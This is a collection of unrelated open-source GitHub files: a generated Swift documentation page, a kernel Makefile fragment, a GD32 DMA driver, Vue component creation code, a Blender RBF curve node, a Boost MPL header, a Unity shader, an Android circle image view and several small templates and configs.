href="../Guides.html">Guides</a> <ul class="nav-group-tasks"> <li class="nav-group-task"> <a href="../uiscrollview-detection.html">UIScrollView Detection</a> </li> </ul> </li> <li class="nav-group-name"> <a href="../Classes.html">Classes</a> <ul class="nav-group-tasks"> <li class="nav-group-task"> <a href="../Classes/DeckSegue.html">DeckSegue</a> </li> <li class="nav-group-task"> <a href="../Classes/DeckTransitioningDelegate.html">DeckTransitioningDelegate</a> </li> </ul> </li> <li class="nav-group-name"> <a href="../Extensions.html">Extensions</a> <ul class="nav-group-tasks"> <li class="nav-group-task"> <a href="../Extensions/UINavigationController.html">UINavigationController</a> </li> <li class="nav-group-task"> <a href="../Extensions/UITabBarController.html">UITabBarController</a> </li> </ul> </li> <li class="nav-group-name"> <a href="../Protocols.html">Protocols</a> <ul class="nav-group-tasks"> <li class="nav-group-task"> <a href="../Protocols/DeckSnapshotUpdater.html">DeckSnapshotUpdater</a> </li> <li class="nav-group-task"> <a href="../Protocols/DeckTransitionViewControllerProtocol.html">DeckTransitionViewControllerProtocol</a> </li> </ul> </li> </ul> </nav> <article class="main-content"> <section> <section class="section"> <h1>UINavigationController</h1> </section> <section class="section task-group-section"> <div class="task-group"> <ul> <li class="item"> <div> <code> <a name="/c:@CM@DeckTransition@@objc(cs)UINavigationController(py)childViewControllerForDeck"></a> <a name="//apple_ref/swift/Property/childViewControllerForDeck" class="dashAnchor"></a> <a class="token" href="#/c:@CM@DeckTransition@@objc(cs)UINavigationController(py)childViewControllerForDeck">childViewControllerForDeck</a> </code> </div> <div class="height-container"> <div class="pointer-container"></div> <section class="section"> <div class="pointer"></div> <div class="abstract"> <p>The view controller at the top of the navigation stack is assumed to contain the <code>UIScrollView</code> to be tracked</p> </div> <div class="declaration"> <h4>Declaration</h4> <div class="language"> <p class="aside-title">Swift</p> <pre class="highlight"><code><span class="kd">public</span> <span class="k">var</span> <span class="nv">childViewControllerForDeck</span><span class="p">:</span> <span class="kt">UIViewController</span><span class="p">?</span></code></pre> </div> </div> <div class="slightly-smaller"> <a href="https://github.com/HarshilShah/DeckTransition/tree/master/Source/Extensions/UIViewController+DeckTransitionViewControllerProtocol.swift#L25-L27">Show on GitHub</a> </div> </section> </div> </li> </ul> </div> </section> </section> <section id="footer"> <p>Copyright © 2017 Harshil Shah. Available under the MIT License.</p> <p>Generated by <a class="link" href="https://github.com/realm/jazzy" target="_blank" rel="external">jazzy ♪♫ v0.9.0</a>, a <a class="link" href="http://realm.io" target="_blank" rel="external">Realm</a> project.</p> </section> </article> </div> </body> </div> </html>
{ "pile_set_name": "Github" }
bnx2i-y := bnx2i_init.o bnx2i_hwi.o bnx2i_iscsi.o bnx2i_sysfs.o obj-$(CONFIG_SCSI_BNX2_ISCSI) += bnx2i.o
{ "pile_set_name": "Github" }
using System.Threading.Tasks; namespace AvalonStudio.Projects { [ExportSolutionType("sln")] public class VisualStudioSolutionType : ISolutionType { public string Description => "Solution File"; public async Task<ISolution> LoadAsync(string path) { return await Task.Run(() => VisualStudioSolution.Load(path)); } } }
{ "pile_set_name": "Github" }
<% title t('navigation.privacy') %> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.summary') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.summary_description') %> </div> </article> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.user_data') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.user_data_description') %> </div> </article> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.cookies') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.cookies_description', { google_privacy_policy: link_to(t('navigation.privacy').downcase, 'http://www.google.com/privacy.html', target: 'blank') }) %> </div> </article> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.social_media') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.social_media_description') %> </div> </article> <article class="article"> <h1 class="articleHeading"><%= t('pages.privacy.contact') %></h1> <div class="articleContent"> <%= raw t('pages.privacy.contact_description', { email_link: link_to(t('common.write_to_us'), "mailto:#{t('email')}"), jamie_king_media: link_to('Jamie King Media', 'http://jamieking.co.uk/resources/download-free-sample-privacy-policy.html', target: 'blank') }) %> </div> </article>
{ "pile_set_name": "Github" }
{ "name": "test", "displayName": "Test", "description": "Lorem ipsum...", "homeUrl": "https://test.org", "logoImageId": "f0552fa9-e03d-47cf-90cd-b9b0b6ba19e2" }
{ "pile_set_name": "Github" }
/*! \file gd32f1x0_dma.c \brief dma driver */ /* Copyright (C) 2016 GigaDevice 2014-12-26, V1.0.0, firmware for GD32F1x0(x=3,5) 2016-01-15, V2.0.0, firmware for GD32F1x0(x=3,5,7,9) 2016-04-30, V3.0.0, firmware update for GD32F1x0(x=3,5,7,9) */ #include "gd32f1x0_dma.h" /*! \brief deinitialize DMA a channel registers \param[in] channelx: specify which DMA channel is deinitialized \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_deinit(dma_channel_enum channelx) { /* disable DMA a channel */ DMA_CHCTL(channelx) &= ~DMA_CHXCTL_CHEN; /* reset DMA channel registers */ DMA_CHCTL(channelx) = DMA_CHCTL_RESET_VALUE; DMA_CHCNT(channelx) = DMA_CHCNT_RESET_VALUE; DMA_CHPADDR(channelx) = DMA_CHPADDR_RESET_VALUE; DMA_CHMADDR(channelx) = DMA_CHMADDR_RESET_VALUE; DMA_INTC |= DMA_FLAG_ADD(DMA_CHINTF_RESET_VALUE,channelx); } /*! \brief initialize DMA channel \param[in] channelx: specify which DMA channel is initialized \arg DMA_CHx(x=0..6) \param[in] init_struct: the data needed to initialize DMA channel periph_addr: peripheral base address periph_width: DMA_PERIPHERAL_WIDTH_8BIT,DMA_PERIPHERAL_WIDTH_16BIT,DMA_PERIPHERAL_WIDTH_32BIT periph_inc: DMA_PERIPH_INCREASE_ENABLE,DMA_PERIPH_INCREASE_DISABLE memory_addr: memory base address memory_width: DMA_MEMORY_WIDTH_8BIT,DMA_MEMORY_WIDTH_16BIT,DMA_MEMORY_WIDTH_32BIT memory_inc: DMA_MEMORY_INCREASE_ENABLE,DMA_MEMORY_INCREASE_DISABLE direction: DMA_PERIPHERA_TO_MEMORY,DMA_MEMORY_TO_PERIPHERA number: the number of remaining data to be transferred by the DMA priority: DMA_PRIORITY_LOW,DMA_PRIORITY_MEDIUM,DMA_PRIORITY_HIGH,DMA_PRIORITY_ULTRA_HIGH \param[out] none \retval none */ void dma_init(dma_channel_enum channelx,dma_parameter_struct init_struct) { uint32_t ctl; /* configure peripheral base address */ DMA_CHPADDR(channelx) = init_struct.periph_addr; /* configure memory base address */ DMA_CHMADDR(channelx) = init_struct.memory_addr; /* configure the number of remaining data to be transferred */ DMA_CHCNT(channelx) = init_struct.number; /* configure peripheral transfer width,memory transfer width, */ ctl = DMA_CHCTL(channelx); ctl &= ~(DMA_CHXCTL_PWIDTH | DMA_CHXCTL_MWIDTH | DMA_CHXCTL_PRIO); ctl |= (init_struct.periph_width | init_struct.memory_width | init_struct.priority); DMA_CHCTL(channelx)=ctl; /* configure peripheral increasing mode */ if(DMA_PERIPH_INCREASE_ENABLE == init_struct.periph_inc){ DMA_CHCTL(channelx) |= DMA_CHXCTL_PNAGA; }else{ DMA_CHCTL(channelx) &= ~DMA_CHXCTL_PNAGA; } /* configure memory increasing mode */ if(DMA_MEMORY_INCREASE_ENABLE == init_struct.memory_inc){ DMA_CHCTL(channelx) |= DMA_CHXCTL_MNAGA; }else{ DMA_CHCTL(channelx) &= ~DMA_CHXCTL_MNAGA; } /* configure the direction of data transfer */ if(DMA_PERIPHERA_TO_MEMORY == init_struct.direction){ DMA_CHCTL(channelx) &= ~DMA_CHXCTL_TM; }else{ DMA_CHCTL(channelx) |= DMA_CHXCTL_TM; } } /*! \brief check DMA flag is set or not \param[in] channelx: specify which DMA channel to get flag \arg DMA_CHx(x=0..6) \param[in] flag: specify get which flag \arg DMA_INTF_ANYIF: global interrupt flag of channel \arg DMA_CHXCTL_FTFIF: transfer complete flag of channel \arg DMA_CHXCTL_HTFIF: half transfer complete flag of channel \arg DMA_CHXCTL_TAEIF: error flag of channel \param[out] none \retval FlagStatus: SET or RESET */ FlagStatus dma_interrupt_flag_get(dma_channel_enum channelx,uint32_t flag) { if(DMA_INTF & DMA_FLAG_ADD(flag,channelx)){ return SET; }else{ return RESET; } } /*! \brief clear DMA a channel flag \param[in] channelx: specify which DMA channel to clear flag \arg DMA_CHx(x=0..6) \param[in] flag: specify get which flag \arg DMA_INTF_ANYIC: clear global interrupt flag of channel \arg DMA_CHXCTL_FTFIF: clear transfer complete flag of channel \arg DMA_CHXCTL_HTFIFC: clear half transfer complete flag of channel \arg DMA_CHXCTL_TAEIFC: clear error flag of channel \param[out] none \retval none */ void dma_interrupt_flag_clear(dma_channel_enum channelx,uint32_t flag) { DMA_INTC |= DMA_FLAG_ADD(flag,channelx); } /*! \brief set DMA peripheral base address \param[in] channelx: specify which DMA channel to set peripheral base address \arg DMA_CHx(x=0..6) \param[in] address: peripheral base address \param[out] none \retval none */ void dma_periph_address_config(dma_channel_enum channelx,uint32_t address) { DMA_CHPADDR(channelx) = address; } /*! \brief set DMA Memory base address \param[in] channelx: specify which DMA channel to set Memory base address \arg DMA_CHx(x=0..6) \param[in] address: Memory base address \param[out] none \retval none */ void dma_memory_address_config(dma_channel_enum channelx,uint32_t address) { DMA_CHMADDR(channelx) = address; } /*! \brief set the number of remaining data to be transferred by the DMA \param[in] channelx: specify which DMA channel to set number \arg DMA_CHx(x=0..6) \param[in] number: the number of remaining data to be transferred by the DMA \param[out] none \retval none */ void dma_transfer_number_config(dma_channel_enum channelx,uint32_t number) { DMA_CHCNT(channelx) = number; } /*! \brief get the number of remaining data to be transferred by the DMA \param[in] channelx: specify which DMA channel to set number \arg DMA_CHx(x=0..6) \param[out] none \retval uint32_t: the number of remaining data to be transferred by the DMA */ uint32_t dma_transfer_number_get(dma_channel_enum channelx) { return (uint32_t)DMA_CHCNT(channelx); } /*! \brief enable memory to memory mode \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_memory_to_memory_enable(dma_channel_enum channelx) { DMA_CHCTL(channelx) |= DMA_CHXCTL_M2M; } /*! \brief disable memory to memory mode \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_memory_to_memory_disable(dma_channel_enum channelx) { DMA_CHCTL(channelx) &= ~DMA_CHXCTL_M2M; } /*! \brief configure priority level of DMA channel \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[in] priority: priority Level of this channel \arg DMA_PRIORITY_LOW: low priority \arg DMA_PRIORITY_MEDIUM: medium priority \arg DMA_PRIORITY_HIGH: high priority \arg DMA_PRIORITY_ULTRA_HIGH: ultra high priority \param[out] none \retval none */ void dma_priority_config(dma_channel_enum channelx,uint32_t priority) { uint32_t ctl; /* acquire DMA_CHxCTL register */ ctl = DMA_CHCTL(channelx); /* assign regiser */ ctl &= ~DMA_CHXCTL_PRIO; ctl |= priority; DMA_CHCTL(channelx) = ctl; } /*! \brief configure transfer data size of memory \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[in] msize: transfer data size of memory \arg DMA_MEMORY_WIDTH_8BIT: transfer data size of memory is 8-bit \arg DMA_MEMORY_WIDTH_16BIT: transfer data size of memory is 16-bit \arg DMA_MEMORY_WIDTH_32BIT: transfer data size of memory is 32-bit \param[out] none \retval none */ void dma_memory_width_config (dma_channel_enum channelx,uint32_t msize) { uint32_t ctl; /* acquire DMA_CHxCTL register */ ctl = DMA_CHCTL(channelx); /* assign regiser */ ctl &= ~DMA_CHXCTL_MWIDTH; ctl |= msize; DMA_CHCTL(channelx) = ctl; } /*! \brief configure transfer data size of peripheral \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[in] msize: transfer data size of peripheral \arg DMA_PERIPHERAL_WIDTH_8BIT: transfer data size of peripheral is 8-bit \arg DMA_PERIPHERAL_WIDTH_16BIT: transfer data size of peripheral is 16-bit \arg DMA_PERIPHERAL_WIDTH_32BIT: transfer data size of peripheral is 32-bit \param[out] none \retval none */ void dma_periph_width_config (dma_channel_enum channelx,uint32_t psize) { uint32_t ctl; /* acquire DMA_CHxCTL register */ ctl = DMA_CHCTL(channelx); /* assign regiser */ ctl &= ~DMA_CHXCTL_PWIDTH; ctl |= psize; DMA_CHCTL(channelx) = ctl; } /*! \brief enable next address increasement algorithm of memory \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_memory_increase_enable(dma_channel_enum channelx) { DMA_CHCTL(channelx) |= DMA_CHXCTL_MNAGA; } /*! \brief disable next address increasement algorithm of memory \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_memory_increase_disable(dma_channel_enum channelx) { DMA_CHCTL(channelx) &= ~DMA_CHXCTL_MNAGA; } /*! \brief enable next address increasement algorithm of peripheral \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_periph_increase_enable(dma_channel_enum channelx) { DMA_CHCTL(channelx) |= DMA_CHXCTL_PNAGA; } /*! \brief disable next address increasement algorithm of peripheral \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_periph_increase_disable(dma_channel_enum channelx) { DMA_CHCTL(channelx) &= ~DMA_CHXCTL_PNAGA; } /*! \brief enable DMA circulation mode \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_circulation_enable(dma_channel_enum channelx) { DMA_CHCTL(channelx) |= DMA_CHXCTL_CMEN; } /*! \brief disable DMA circulation mode \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_circulation_disable(dma_channel_enum channelx) { DMA_CHCTL(channelx) &= ~DMA_CHXCTL_CMEN; } /*! \brief configure the direction of data transfer on the channel \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[in] direction: specify the direction of data transfer \arg DMA_PERIPHERA_TO_MEMORY: read from peripheral and write to memory \arg DMA_MEMORY_TO_PERIPHERA: read from memory and write to peripheral \param[out] none \retval none */ void dma_transfer_direction_config(dma_channel_enum channelx,uint8_t direction) { if(DMA_PERIPHERA_TO_MEMORY == direction){ DMA_CHCTL(channelx) &= ~DMA_CHXCTL_TM; } else { DMA_CHCTL(channelx) |= DMA_CHXCTL_TM; } } /*! \brief enable DMA interrupt \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[in] source: specify which interrupt to enbale \arg DMA_CHXCTL_TAEIE: channel error interrupt \arg DMA_CHXCTL_HTFIE: channel transfer half complete interrupt \arg DMA_CHXCTL_FTFIE: channel transfer complete interrupt \param[out] none \retval none */ void dma_interrupt_enable(dma_channel_enum channelx,uint32_t source) { DMA_CHCTL(channelx) |= source; } /*! \brief disable DMA interrupt \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[in] source: specify which interrupt to disbale \arg DMA_CHXCTL_TAEIE: channel error interrupt \arg DMA_CHXCTL_HTFIE: channel transfer half complete interrupt \arg DMA_CHXCTL_FTFIE: for channel transfer complete interrupt \param[out] none \retval none */ void dma_interrupt_disable(dma_channel_enum channelx,uint32_t source) { DMA_CHCTL(channelx) &= ~source; } /*! \brief enable DMA channel \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_channel_enable(dma_channel_enum channelx) { DMA_CHCTL(channelx) |= DMA_CHXCTL_CHEN; } /*! \brief disable DMA channel \param[in] channelx: specify which DMA channel \arg DMA_CHx(x=0..6) \param[out] none \retval none */ void dma_channel_disable(dma_channel_enum channelx) { DMA_CHCTL(channelx) &= ~DMA_CHXCTL_CHEN; }
{ "pile_set_name": "Github" }
/* @flow */ import VNode from './vnode' import { resolveConstructorOptions } from 'core/instance/init' import { queueActivatedComponent } from 'core/observer/scheduler' import { createFunctionalComponent } from './create-functional-component' import { warn, isDef, isUndef, isTrue, isObject } from '../util/index' import { resolveAsyncComponent, createAsyncPlaceholder, extractPropsFromVNodeData } from './helpers/index' import { callHook, activeInstance, updateChildComponent, activateChildComponent, deactivateChildComponent } from '../instance/lifecycle' import { isRecyclableComponent, renderRecyclableComponentTemplate } from 'weex/runtime/recycle-list/render-component-template' // hooks to be invoked on component VNodes during patch const componentVNodeHooks = { init ( vnode: VNodeWithData, hydrating: boolean, parentElm: ?Node, refElm: ?Node ): ?boolean { if (!vnode.componentInstance || vnode.componentInstance._isDestroyed) { const child = vnode.componentInstance = createComponentInstanceForVnode( vnode, activeInstance, parentElm, refElm ) child.$mount(hydrating ? vnode.elm : undefined, hydrating) } else if (vnode.data.keepAlive) { // kept-alive components, treat as a patch const mountedNode: any = vnode // work around flow componentVNodeHooks.prepatch(mountedNode, mountedNode) } }, prepatch (oldVnode: MountedComponentVNode, vnode: MountedComponentVNode) { const options = vnode.componentOptions const child = vnode.componentInstance = oldVnode.componentInstance updateChildComponent( child, options.propsData, // updated props options.listeners, // updated listeners vnode, // new parent vnode options.children // new children ) }, insert (vnode: MountedComponentVNode) { const { context, componentInstance } = vnode if (!componentInstance._isMounted) { componentInstance._isMounted = true callHook(componentInstance, 'mounted') } if (vnode.data.keepAlive) { if (context._isMounted) { // vue-router#1212 // During updates, a kept-alive component's child components may // change, so directly walking the tree here may call activated hooks // on incorrect children. Instead we push them into a queue which will // be processed after the whole patch process ended. queueActivatedComponent(componentInstance) } else { activateChildComponent(componentInstance, true /* direct */) } } }, destroy (vnode: MountedComponentVNode) { const { componentInstance } = vnode if (!componentInstance._isDestroyed) { if (!vnode.data.keepAlive) { componentInstance.$destroy() } else { deactivateChildComponent(componentInstance, true /* direct */) } } } } const hooksToMerge = Object.keys(componentVNodeHooks) export function createComponent ( Ctor: Class<Component> | Function | Object | void, data: ?VNodeData, context: Component, children: ?Array<VNode>, tag?: string ): VNode | void { if (isUndef(Ctor)) { return } const baseCtor = context.$options._base // plain options object: turn it into a constructor if (isObject(Ctor)) { Ctor = baseCtor.extend(Ctor) } // if at this stage it's not a constructor or an async component factory, // reject. if (typeof Ctor !== 'function') { if (process.env.NODE_ENV !== 'production') { warn(`Invalid Component definition: ${String(Ctor)}`, context) } return } // async component let asyncFactory if (isUndef(Ctor.cid)) { asyncFactory = Ctor Ctor = resolveAsyncComponent(asyncFactory, baseCtor, context) if (Ctor === undefined) { // return a placeholder node for async component, which is rendered // as a comment node but preserves all the raw information for the node. // the information will be used for async server-rendering and hydration. return createAsyncPlaceholder( asyncFactory, data, context, children, tag ) } } data = data || {} // resolve constructor options in case global mixins are applied after // component constructor creation resolveConstructorOptions(Ctor) // transform component v-model data into props & events if (isDef(data.model)) { transformModel(Ctor.options, data) } // extract props const propsData = extractPropsFromVNodeData(data, Ctor, tag) // functional component if (isTrue(Ctor.options.functional)) { return createFunctionalComponent(Ctor, propsData, data, context, children) } // extract listeners, since these needs to be treated as // child component listeners instead of DOM listeners const listeners = data.on // replace with listeners with .native modifier // so it gets processed during parent component patch. data.on = data.nativeOn if (isTrue(Ctor.options.abstract)) { // abstract components do not keep anything // other than props & listeners & slot // work around flow const slot = data.slot data = {} if (slot) { data.slot = slot } } // merge component management hooks onto the placeholder node mergeHooks(data) // return a placeholder vnode const name = Ctor.options.name || tag const vnode = new VNode( `vue-component-${Ctor.cid}${name ? `-${name}` : ''}`, data, undefined, undefined, undefined, context, { Ctor, propsData, listeners, tag, children }, asyncFactory ) // Weex specific: invoke recycle-list optimized @render function for // extracting cell-slot template. // https://github.com/Hanks10100/weex-native-directive/tree/master/component /* istanbul ignore if */ if (__WEEX__ && isRecyclableComponent(vnode)) { return renderRecyclableComponentTemplate(vnode) } return vnode } export function createComponentInstanceForVnode ( vnode: any, // we know it's MountedComponentVNode but flow doesn't parent: any, // activeInstance in lifecycle state parentElm?: ?Node, refElm?: ?Node ): Component { const options: InternalComponentOptions = { _isComponent: true, parent, _parentVnode: vnode, _parentElm: parentElm || null, _refElm: refElm || null } // check inline-template render functions const inlineTemplate = vnode.data.inlineTemplate if (isDef(inlineTemplate)) { options.render = inlineTemplate.render options.staticRenderFns = inlineTemplate.staticRenderFns } return new vnode.componentOptions.Ctor(options) } function mergeHooks (data: VNodeData) { if (!data.hook) { data.hook = {} } for (let i = 0; i < hooksToMerge.length; i++) { const key = hooksToMerge[i] const fromParent = data.hook[key] const ours = componentVNodeHooks[key] data.hook[key] = fromParent ? mergeHook(ours, fromParent) : ours } } function mergeHook (one: Function, two: Function): Function { return function (a, b, c, d) { one(a, b, c, d) two(a, b, c, d) } } // transform component v-model info (value and callback) into // prop and event handler respectively. function transformModel (options, data: any) { const prop = (options.model && options.model.prop) || 'value' const event = (options.model && options.model.event) || 'input' ;(data.props || (data.props = {}))[prop] = data.model.value const on = data.on || (data.on = {}) if (isDef(on[event])) { on[event] = [data.model.callback].concat(on[event]) } else { on[event] = data.model.callback } }
{ "pile_set_name": "Github" }
import numpy as np import bpy from bpy.props import FloatProperty, EnumProperty, BoolProperty, IntProperty from sverchok.node_tree import SverchCustomTreeNode, throttled from sverchok.data_structure import updateNode, zip_long_repeat, ensure_nesting_level from sverchok.utils.logging import info, exception from sverchok.utils.curve import make_euclidian_ts from sverchok.utils.curve.rbf import SvRbfCurve from sverchok.utils.dummy_nodes import add_dummy from sverchok.dependencies import scipy from sverchok.utils.math import rbf_functions if scipy is None: add_dummy('SvRbfCurveNode', "RBF Curve", 'scipy') else: from scipy.interpolate import Rbf class SvExRbfCurveNode(bpy.types.Node, SverchCustomTreeNode): """ Triggers: Minimal RBF Curve Tooltip: Generate interpolating or approximating curve by RBF method """ bl_idname = 'SvExRbfCurveNode' bl_label = 'RBF Curve' bl_icon = 'CURVE_NCURVE' sv_icon = 'SV_INTERP_CURVE' function : EnumProperty( name = "Function", items = rbf_functions, default = 'multiquadric', update = updateNode) smooth : FloatProperty( name = "Smooth", default = 0.0, min = 0.0, update = updateNode) epsilon : FloatProperty( name = "Epsilon", default = 1.0, min = 0.0, update = updateNode) def draw_buttons(self, context, layout): layout.prop(self, "function") def sv_init(self, context): self.inputs.new('SvVerticesSocket', "Vertices") self.inputs.new('SvStringsSocket', "Epsilon").prop_name = 'epsilon' self.inputs.new('SvStringsSocket', "Smooth").prop_name = 'smooth' self.outputs.new('SvCurveSocket', "Curve") def process(self): if not any(socket.is_linked for socket in self.outputs): return vertices_s = self.inputs['Vertices'].sv_get() vertices_s = ensure_nesting_level(vertices_s, 3) epsilon_s = self.inputs['Epsilon'].sv_get() smooth_s = self.inputs['Smooth'].sv_get() curves_out = [] for vertices, epsilon, smooth in zip_long_repeat(vertices_s, epsilon_s, smooth_s): if isinstance(epsilon, (list, int)): epsilon = epsilon[0] if isinstance(smooth, (list, int)): smooth = smooth[0] vertices = np.array(vertices) ts = make_euclidian_ts(vertices) rbf = Rbf(ts, vertices, function=self.function, smooth=smooth, epsilon=epsilon, mode='N-D') curve = SvRbfCurve(rbf, (0.0, 1.0)) curves_out.append(curve) self.outputs['Curve'].sv_set(curves_out) def register(): if scipy is not None: bpy.utils.register_class(SvExRbfCurveNode) def unregister(): if scipy is not None: bpy.utils.unregister_class(SvExRbfCurveNode)
{ "pile_set_name": "Github" }
#ifndef BOOST_MPL_SET_AUX_INSERT_IMPL_HPP_INCLUDED #define BOOST_MPL_SET_AUX_INSERT_IMPL_HPP_INCLUDED // Copyright Aleksey Gurtovoy 2003-2007 // Copyright David Abrahams 2003-2004 // // Distributed under the Boost Software License, Version 1.0. // (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) // // See http://www.boost.org/libs/mpl for documentation. // $Id$ // $Date$ // $Revision$ #include <boost/mpl/insert_fwd.hpp> #include <boost/mpl/set/aux_/has_key_impl.hpp> #include <boost/mpl/set/aux_/item.hpp> #include <boost/mpl/set/aux_/tag.hpp> #include <boost/mpl/identity.hpp> #include <boost/mpl/base.hpp> #include <boost/mpl/eval_if.hpp> #include <boost/mpl/aux_/na.hpp> #include <boost/type_traits/is_same.hpp> namespace boost { namespace mpl { namespace aux { template< typename Set, typename T > struct set_insert_impl : eval_if< has_key_impl<aux::set_tag>::apply<Set,T> , identity<Set> , eval_if< is_same< T,typename Set::last_masked_ > , base<Set> , identity< s_item<T,typename Set::item_> > > > { }; } template<> struct insert_impl< aux::set_tag > { template< typename Set , typename PosOrKey , typename KeyOrNA > struct apply : aux::set_insert_impl< Set , typename if_na<KeyOrNA,PosOrKey>::type > { }; }; }} #endif // BOOST_MPL_SET_AUX_INSERT_IMPL_HPP_INCLUDED
{ "pile_set_name": "Github" }
//reference: http://madebyevan.com/shaders/curvature/ //It looks the best with high-poly geometry Shader "Screen Space Curvature Shader" { Subshader { Tags { "RenderType"="Opaque" } Pass { Tags{ "LightMode" = "ForwardBase" } CGPROGRAM #pragma vertex vertex_shader #pragma fragment pixel_shader #pragma target 3.0 struct structure { float4 gl_Position : SV_POSITION; float3 normal : NORMAL; float3 vertex : TEXCOORD0; }; structure vertex_shader (float4 vertex:POSITION, float3 normal:NORMAL) { structure vs; vs.gl_Position = UnityObjectToClipPos (vertex); vs.normal = normal; vs.vertex = vertex; return vs; } float4 pixel_shader (structure ps) : COLOR { float3 n = normalize(ps.normal); float3 dx = ddx(n); float3 dy = ddy(n); float3 xneg = n - dx; float3 xpos = n + dx; float3 yneg = n - dy; float3 ypos = n + dy; float depth = length(ps.vertex); float curvature = (cross(xneg,xpos).y-cross(yneg,ypos).x)*4.0/depth; return (curvature+0.5); } ENDCG } } }
{ "pile_set_name": "Github" }
package com.idrv.coach.ui.widget; import android.content.Context; import android.content.res.Resources; import android.graphics.Canvas; import android.graphics.Color; import android.graphics.Paint; import android.graphics.RadialGradient; import android.graphics.Shader; import android.graphics.drawable.ShapeDrawable; import android.graphics.drawable.shapes.OvalShape; import android.support.v4.view.ViewCompat; import android.view.animation.Animation; import android.widget.ImageView; /** * Private class created to work around issues with AnimationListeners being * called before the animation is actually complete and support shadows on older * platforms. */ class CircleImageView extends ImageView { private static final int KEY_SHADOW_COLOR = 0x1E000000; private static final int FILL_SHADOW_COLOR = 0x3D000000; // PX private static final float X_OFFSET = 0f; private static final float Y_OFFSET = 1.75f; private static final float SHADOW_RADIUS = 3.5f; private static final int SHADOW_ELEVATION = 4; private Animation.AnimationListener mListener; private int mShadowRadius; public CircleImageView(Context context, int color, final float radius) { super(context); final float density = getContext().getResources().getDisplayMetrics().density; final int diameter = (int) (radius * density * 2); final int shadowYOffset = (int) (density * Y_OFFSET); final int shadowXOffset = (int) (density * X_OFFSET); mShadowRadius = (int) (density * SHADOW_RADIUS); ShapeDrawable circle; if (elevationSupported()) { circle = new ShapeDrawable(new OvalShape()); ViewCompat.setElevation(this, SHADOW_ELEVATION * density); } else { OvalShape oval = new OvalShadow(mShadowRadius, diameter); circle = new ShapeDrawable(oval); ViewCompat.setLayerType(this, ViewCompat.LAYER_TYPE_SOFTWARE, circle.getPaint()); circle.getPaint().setShadowLayer(mShadowRadius, shadowXOffset, shadowYOffset, KEY_SHADOW_COLOR); final int padding = (int) mShadowRadius; // set padding so the inner image sits correctly within the shadow. setPadding(padding, padding, padding, padding); } circle.getPaint().setColor(color); setBackgroundDrawable(circle); } private boolean elevationSupported() { return android.os.Build.VERSION.SDK_INT >= 21; } @Override protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) { super.onMeasure(widthMeasureSpec, heightMeasureSpec); if (!elevationSupported()) { setMeasuredDimension(getMeasuredWidth() + mShadowRadius * 2, getMeasuredHeight() + mShadowRadius * 2); } } public void setAnimationListener(Animation.AnimationListener listener) { mListener = listener; } @Override public void onAnimationStart() { super.onAnimationStart(); if (mListener != null) { mListener.onAnimationStart(getAnimation()); } } @Override public void onAnimationEnd() { super.onAnimationEnd(); if (mListener != null) { mListener.onAnimationEnd(getAnimation()); } } /** * Update the background color of the circle image view. */ public void setBackgroundColor(int colorRes) { if (getBackground() instanceof ShapeDrawable) { final Resources res = getResources(); ((ShapeDrawable) getBackground()).getPaint().setColor(res.getColor(colorRes)); } } private class OvalShadow extends OvalShape { private RadialGradient mRadialGradient; private int mShadowRadius; private Paint mShadowPaint; private int mCircleDiameter; public OvalShadow(int shadowRadius, int circleDiameter) { super(); mShadowPaint = new Paint(); mShadowRadius = shadowRadius; mCircleDiameter = circleDiameter; mRadialGradient = new RadialGradient(mCircleDiameter / 2, mCircleDiameter / 2, mShadowRadius, new int[]{ FILL_SHADOW_COLOR, Color.TRANSPARENT }, null, Shader.TileMode.CLAMP); mShadowPaint.setShader(mRadialGradient); } @Override public void draw(Canvas canvas, Paint paint) { final int viewWidth = CircleImageView.this.getWidth(); final int viewHeight = CircleImageView.this.getHeight(); canvas.drawCircle(viewWidth / 2, viewHeight / 2, (mCircleDiameter / 2 + mShadowRadius), mShadowPaint); canvas.drawCircle(viewWidth / 2, viewHeight / 2, (mCircleDiameter / 2), paint); } } }
{ "pile_set_name": "Github" }
This is *italic* and this is **bold**. This is NOT _italic_ and this is __bold__ because --code-safe is turned on.
{ "pile_set_name": "Github" }
